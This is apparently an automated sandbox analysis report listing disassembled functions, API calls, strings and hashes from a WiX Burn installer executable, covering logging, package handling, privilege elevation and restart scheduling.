                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Sleep
                                                                                                                                                          • String ID: Failed to copy default log extension.$Failed to copy default log prefix.$Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log file path from command line.$Failed to copy log path to prefix.$Failed to get non-session specific TEMP folder.$Failed to get parent directory from '%ls'.$Failed to initialize logging.$Failed to open log: %ls$Setup$d:\a\wix\wix\src\burn\engine\logging.cpp$log
                                                                                                                                                          • API String ID: 3472027048-3281194130
                                                                                                                                                          • Opcode ID: 72fcfabbd8645d24726cd60012cd211c8a0632b62d19165ca35e5117a22098f2
                                                                                                                                                          • Instruction ID: a68c656b461b79c70987de18d7a1fbd448c366965086efab4b0f35907c67c0d0
                                                                                                                                                          • Opcode Fuzzy Hash: 72fcfabbd8645d24726cd60012cd211c8a0632b62d19165ca35e5117a22098f2
                                                                                                                                                          • Instruction Fuzzy Hash: 57B1F771A44316BADB21DE65CC51FEB77A8EF04700F10452BF905AB2D1E7B8AD8087A9
                                                                                                                                                          Function 004281B8 Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 233COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF), ref: 0042837D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CompareString
                                                                                                                                                          • String ID: Failed to execute compatible MSI package.$Failed to find package: %ls$Failed to read MSI compatible package id.$Failed to read MSI package id.$Failed to read package log.$Failed to read parent hwnd.$Failed to read rollback flag.$Failed to read variables.$Package '%ls' has no compatible MSI package$Package '%ls' has no compatible package with id: %ls$d:\a\wix\wix\src\burn\engine\elevation.cpp
                                                                                                                                                          • API String ID: 1825529933-3529711143
                                                                                                                                                          • Opcode ID: 824f5e16b6047993b5497a47c43ec2522344152decc9f8b13d4197e78644a029
                                                                                                                                                          • Instruction ID: 9b6314759b441646bdf34e5b15d03d2becc429f8447df183e4857b0aaf84d985
                                                                                                                                                          • Opcode Fuzzy Hash: 824f5e16b6047993b5497a47c43ec2522344152decc9f8b13d4197e78644a029
                                                                                                                                                          • Instruction Fuzzy Hash: 8D71D971B81629F7DB11EAD1CC46FEF7A7CAB44B10F61015BB501BA1C1E678AA00CB69
                                                                                                                                                          Function 004759DC Relevance: 21.2, APIs: 3, Strings: 9, Instructions: 191COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004073CD: GetProcessHeap.KERNEL32(?,?,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073DE
                                                                                                                                                            • Part of subcall function 004073CD: HeapAlloc.KERNEL32(00000000,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073E5
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000010,00000001,00000000,00000000,00000000,?,?,?,0044907A,?), ref: 00475A0B
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF,?,?,?,0044907A,?,000000B0,00000000,?,000000B0,00000000), ref: 00475A26
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to allocate default application type., xrefs: 00475AD7
                                                                                                                                                          • Failed to allocate default application id., xrefs: 00475AE5
                                                                                                                                                          • Failed to process ATOM entry., xrefs: 00475BAA
                                                                                                                                                          • http://appsyndication.org/2006/appsyn, xrefs: 004759FE
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\apuputil.cpp, xrefs: 00475ABD, 00475AF1, 00475B8D
                                                                                                                                                          • Failed to allocate memory for update entries., xrefs: 00475AC9
                                                                                                                                                          • type, xrefs: 00475A4D
                                                                                                                                                          • Failed to reallocate memory for update entries., xrefs: 00475B99
                                                                                                                                                          • application, xrefs: 00475A18
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CompareHeapString$AllocProcess
                                                                                                                                                          • String ID: Failed to allocate default application id.$Failed to allocate default application type.$Failed to allocate memory for update entries.$Failed to process ATOM entry.$Failed to reallocate memory for update entries.$application$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\apuputil.cpp$http://appsyndication.org/2006/appsyn$type
                                                                                                                                                          • API String ID: 3166321894-3008309987
                                                                                                                                                          • Opcode ID: d4dbeb64ad21c01d1c820d8f24c611d572ed74f48d216dc6033dc07d04197f52
                                                                                                                                                          • Instruction ID: e1184d8e121f69e982f1bf53841560ad722b840108a7ac1ef1533108f27317b9
                                                                                                                                                          • Opcode Fuzzy Hash: d4dbeb64ad21c01d1c820d8f24c611d572ed74f48d216dc6033dc07d04197f52
                                                                                                                                                          • Instruction Fuzzy Hash: BF51EA30B84B05BBDB209A15CC82F5B77659B15B24F20C22AF619BF2D1D6FCF9408B18
                                                                                                                                                          Function 00466ADD Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 143COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • OpenProcessToken.ADVAPI32(004707E8,00000008,00000000,00000000,00000000,?,?,?,00466E83,004707E8,00000001,00000000,00000000,00000000), ref: 00466AF5
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00466E83,004707E8,00000001,00000000,00000000,00000000,?,?,004707E8), ref: 00466AFF
                                                                                                                                                          • GetTokenInformation.ADVAPI32(00000000,?,00000000,00000000,004707E8,?,?,?,00466E83,004707E8,00000001,00000000,00000000,00000000), ref: 00466B51
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00466E83,004707E8,00000001,00000000,00000000,00000000,?,?,004707E8), ref: 00466B5B
                                                                                                                                                          • GetTokenInformation.ADVAPI32(00000000,?,00000000,004707E8,004707E8,004707E8,00000001,00000000,?,?,?,00466E83,004707E8,00000001,00000000,00000000), ref: 00466BE7
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00466E83,004707E8,00000001,00000000,00000000,00000000,?,?,004707E8), ref: 00466BF1
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00466E83,004707E8,00000001,00000000,00000000,00000000,?,?,004707E8), ref: 00466C55
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastToken$Information$CloseHandleOpenProcess
                                                                                                                                                          • String ID: Failed to allocate token information.$Failed to get information from process token size.$Failed to get information from process token.$Failed to open process token.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\procutil.cpp
                                                                                                                                                          • API String ID: 3038379890-1500648792
                                                                                                                                                          • Opcode ID: 7146cdf74c3960edb32703c4b862ca8927de3532142b3b17b9fbca0a26ef0418
                                                                                                                                                          • Instruction ID: 3e4991f2e72306c5329b07a8f8c12c8e28a512252551403bf706d02bafbddbd6
                                                                                                                                                          • Opcode Fuzzy Hash: 7146cdf74c3960edb32703c4b862ca8927de3532142b3b17b9fbca0a26ef0418
                                                                                                                                                          • Instruction Fuzzy Hash: 5C41D632E40334B7E72056558D0AFAF7E68DB05F64F03406ABE48BA2D1F67C5D4096EA
                                                                                                                                                          Function 00408525 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 120sleepshutdownCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcess.KERNEL32(SeShutdownPrivilege,?,00000000,00000001,A0000005,?,00409781,?,?,?,?,?,?,?), ref: 00408539
                                                                                                                                                            • Part of subcall function 00466838: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00466870
                                                                                                                                                            • Part of subcall function 00466838: GetLastError.KERNEL32 ref: 0046687A
                                                                                                                                                            • Part of subcall function 00466838: CloseHandle.KERNEL32(00000000), ref: 00466991
                                                                                                                                                          • Sleep.KERNEL32(000003E8,?,00000001,00000000,?,00409781,?,?,?,?,?,?,?), ref: 0040858C
                                                                                                                                                          • InitiateSystemShutdownExW.ADVAPI32(?,00409781,?,?,?,?), ref: 004085AB
                                                                                                                                                          • GetLastError.KERNEL32(?,00409781,?,?,?,?,?,?,?), ref: 004085B1
                                                                                                                                                            • Part of subcall function 00424B76: EnterCriticalSection.KERNEL32(?,00000000,00000000,?,0040857F,?,00000001,00000000,?,00409781,?,?,?,?,?,?), ref: 00424B85
                                                                                                                                                            • Part of subcall function 00424B76: LeaveCriticalSection.KERNEL32(?,?,0040857F,?,00000001,00000000,?,00409781,?,?,?,?,?,?,?), ref: 00424BA6
                                                                                                                                                          • IsWindow.USER32(?), ref: 00408621
                                                                                                                                                          • Sleep.KERNEL32(000000FA,?,00409781,?,?,?,?,?,?,?), ref: 0040863B
                                                                                                                                                          • Sleep.KERNEL32(000000FA,?,00409781,?,?,?,?,?,?,?), ref: 00408670
                                                                                                                                                          • IsWindow.USER32(?), ref: 0040867C
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Sleep$CriticalErrorLastSectionWindow$CloseCurrentEnterHandleInitiateLeaveLookupPrivilegeProcessShutdownSystemValue
                                                                                                                                                          • String ID: Failed to enable shutdown privilege in process token.$Failed to schedule restart.$SeShutdownPrivilege$d:\a\wix\wix\src\burn\engine\engine.cpp
                                                                                                                                                          • API String ID: 2197606043-2346934537
                                                                                                                                                          • Opcode ID: bd680eae1db0abbc5e68bcdd82badf2f2e22446dce5e4eec3c5df1efa9e35b9e
                                                                                                                                                          • Instruction ID: 5812950b357077d429f8c2238bfe0df0810bfa5ba3815571a64f9ebcd3703605
                                                                                                                                                          • Opcode Fuzzy Hash: bd680eae1db0abbc5e68bcdd82badf2f2e22446dce5e4eec3c5df1efa9e35b9e
                                                                                                                                                          • Instruction Fuzzy Hash: 06312371A44310BBDB205B658D89F6B3658EB80B50F56407FFD8DFB2D2DA788C4186AC
                                                                                                                                                          Function 004253F1 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 94COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcessId.KERNEL32(0000071C,00000000,00000000,2000000A,2000000A,?,00429CA6,00000000,?,0000071C,00000001,0000071C,00000720,000000B0,00000000,00000000), ref: 004253F9
                                                                                                                                                          • CloseHandle.KERNEL32(00009003,?,00421F0E,00000000,00009003,?,?,00000001,?,WixBundleOriginalSource,?,?,?,?,?,?), ref: 00425502
                                                                                                                                                            • Part of subcall function 0046D534: ShellExecuteExW.SHELL32 ref: 0046D5B0
                                                                                                                                                            • Part of subcall function 0046D534: GetLastError.KERNEL32 ref: 0046D5B6
                                                                                                                                                            • Part of subcall function 0046D534: CloseHandle.KERNEL32(00421F0E), ref: 0046D606
                                                                                                                                                          • GetProcessId.KERNEL32(00009003,?,00000000,runas,00000000,00000008,00421F0E,00009003,00000000,00000001,?,00421F0E,00000000,00009003,?), ref: 004254E2
                                                                                                                                                          Strings
                                                                                                                                                          • -q -%ls %ls %ls %u, xrefs: 0042541F
                                                                                                                                                          • burn.log.mode, xrefs: 00425465
                                                                                                                                                          • Failed to launch elevated child process: %ls, xrefs: 004254BE
                                                                                                                                                          • runas, xrefs: 0042549F
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\elevation.cpp, xrefs: 00425445, 004254D0
                                                                                                                                                          • burn.elevated, xrefs: 0042541A
                                                                                                                                                          • -%ls=%ls, xrefs: 0042546D
                                                                                                                                                          • Failed to allocate parameters for elevated process., xrefs: 00425433
                                                                                                                                                          • Failed to set log mode in elevated process command-line., xrefs: 00425481
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandleProcess$CurrentErrorExecuteLastShell
                                                                                                                                                          • String ID: -%ls=%ls$-q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$Failed to set log mode in elevated process command-line.$burn.elevated$burn.log.mode$d:\a\wix\wix\src\burn\engine\elevation.cpp$runas
                                                                                                                                                          • API String ID: 163010291-2711961656
                                                                                                                                                          • Opcode ID: d14b15ecc445a750dec376cd73a23cbc02523c79866305dc7002b163d55b426b
                                                                                                                                                          • Instruction ID: 765f97dd01be9cc76018a4e8d44b24a9e5024d1ff8b52d7b844a4ca05c22a9d9
                                                                                                                                                          • Opcode Fuzzy Hash: d14b15ecc445a750dec376cd73a23cbc02523c79866305dc7002b163d55b426b
                                                                                                                                                          • Instruction Fuzzy Hash: CD31F771F80714BBDB11AF908C46FCEBA64EB04755FA0416BF90875290E7BD6E908B98
                                                                                                                                                          Function 0040BA5B Relevance: 19.8, APIs: 2, Strings: 11, Instructions: 293COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,00000024,00000001,00000001,00000000,?,00000120,00000001,00000000,00000120,00000024,?,00000000,?), ref: 0040BA87
                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0040BD8A
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to read variable value type., xrefs: 0040BD40
                                                                                                                                                          • Failed to read variable included flag., xrefs: 0040BD68
                                                                                                                                                          • Failed to parse variable value as version., xrefs: 0040BC8F
                                                                                                                                                          • Failed to set variable value., xrefs: 0040BC78, 0040BCD9, 0040BD04
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\variable.cpp, xrefs: 0040BD7A
                                                                                                                                                          • Unsupported variable type., xrefs: 0040BCBD
                                                                                                                                                          • Failed to read variable value as string., xrefs: 0040BCA6, 0040BD18
                                                                                                                                                          • Failed to set variable., xrefs: 0040BD2C
                                                                                                                                                          • Failed to read variable count., xrefs: 0040BAA7
                                                                                                                                                          • Failed to read variable value as number., xrefs: 0040BCF0
                                                                                                                                                          • Failed to read variable name., xrefs: 0040BD54
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                          • String ID: Failed to parse variable value as version.$Failed to read variable count.$Failed to read variable included flag.$Failed to read variable name.$Failed to read variable value as number.$Failed to read variable value as string.$Failed to read variable value type.$Failed to set variable value.$Failed to set variable.$Unsupported variable type.$d:\a\wix\wix\src\burn\engine\variable.cpp
                                                                                                                                                          • API String ID: 3168844106-1815584021
                                                                                                                                                          • Opcode ID: 8b18fbee9c43a8423b0519d25c33069626ced4e2ca5533fc2678e51eef87afd5
                                                                                                                                                          • Instruction ID: babdee2abaa15384cd02f9ca84437547e75e06066543658b2963126aa4ed5239
                                                                                                                                                          • Opcode Fuzzy Hash: 8b18fbee9c43a8423b0519d25c33069626ced4e2ca5533fc2678e51eef87afd5
                                                                                                                                                          • Instruction Fuzzy Hash: F1918871940719BBEF229A65CC46FEFBA78EF04B14F150127FA01BA1D0E7B8990096DD
                                                                                                                                                          Function 0040CCFB Relevance: 19.7, APIs: 2, Strings: 11, Instructions: 211COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,8000FFFF,004777D8,00000000,00000000,00000000,00000000,8000FFFF,?,8000FFFF,8000FFFF,000000B0), ref: 0040CD12
                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0040CF6B
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to write included flag., xrefs: 0040CF44
                                                                                                                                                          • Failed to write variable name., xrefs: 0040CF30
                                                                                                                                                          • feclient.dll, xrefs: 0040CE03, 0040CE7A
                                                                                                                                                          • Failed to write variable count., xrefs: 0040CD2F
                                                                                                                                                          • Failed to get string., xrefs: 0040CF08
                                                                                                                                                          • Failed to write variable value as string., xrefs: 0040CEF4
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\variable.cpp, xrefs: 0040CD41, 0040CF56
                                                                                                                                                          • Unsupported variable type., xrefs: 0040CEB0
                                                                                                                                                          • Failed to write variable value as number., xrefs: 0040CECC
                                                                                                                                                          • Failed to write variable value type., xrefs: 0040CF1C
                                                                                                                                                          • Failed to get numeric., xrefs: 0040CEE0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                          • String ID: Failed to get numeric.$Failed to get string.$Failed to write included flag.$Failed to write variable count.$Failed to write variable name.$Failed to write variable value as number.$Failed to write variable value as string.$Failed to write variable value type.$Unsupported variable type.$d:\a\wix\wix\src\burn\engine\variable.cpp$feclient.dll
                                                                                                                                                          • API String ID: 3168844106-796084773
                                                                                                                                                          • Opcode ID: 16e9012f7c6037430f833a4fa1c8d9b2d168e44f424c84e3d8b66b4c15079491
                                                                                                                                                          • Instruction ID: 0528240f37f1213658fc3d70dd22bbe63b084af3d332372db55120379c51b94e
                                                                                                                                                          • Opcode Fuzzy Hash: 16e9012f7c6037430f833a4fa1c8d9b2d168e44f424c84e3d8b66b4c15079491
                                                                                                                                                          • Instruction Fuzzy Hash: DF61963194071AFBDB229F64CC85F9B7B65AF04750F104267F6047A2D0D3B8A9509BDE
                                                                                                                                                          Function 0044A910 Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 327COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __aulldiv
                                                                                                                                                          • String ID: BA aborted acquire of %hs: %ls$BA aborted container or payload verify: %ls$BA aborted extract container: %ls, payload: %ls$BA aborted finalize step during verify of %hs: %ls$BA aborted hash step during verify of %hs: %ls$BA aborted payload verify step during verify of %hs: %ls$BA aborted stage step during verify of %hs: %ls$container$d:\a\wix\wix\src\burn\engine\apply.cpp$payload
                                                                                                                                                          • API String ID: 3732870572-1895345652
                                                                                                                                                          • Opcode ID: a223d591edae071d6439ff837b943deccf24e6b6ac57af6db1d1b2d5b522e91d
                                                                                                                                                          • Instruction ID: e2f9a6d473e085de77386ec38c88426e0939b0db44018caee5d7bef7f09fdaa3
                                                                                                                                                          • Opcode Fuzzy Hash: a223d591edae071d6439ff837b943deccf24e6b6ac57af6db1d1b2d5b522e91d
                                                                                                                                                          • Instruction Fuzzy Hash: 78B1EE71A80225BBFF11CE55CC81EAB7F69EB04754F01412AFA04AB251D378DD60DBAA
                                                                                                                                                          Function 0043EC6A Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 233COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • WaitForInputIdle.USER32(?,00001388), ref: 0043ED79
                                                                                                                                                          • GetProcessId.KERNEL32(?,?,?,0043B8EF,00000000), ref: 0043ED87
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,?,d:\a\wix\wix\src\burn\engine\exeengine.cpp,00000306,00000000), ref: 0043EF13
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,?,d:\a\wix\wix\src\burn\engine\exeengine.cpp,00000306,00000000), ref: 0043EF26
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle$IdleInputProcessWait
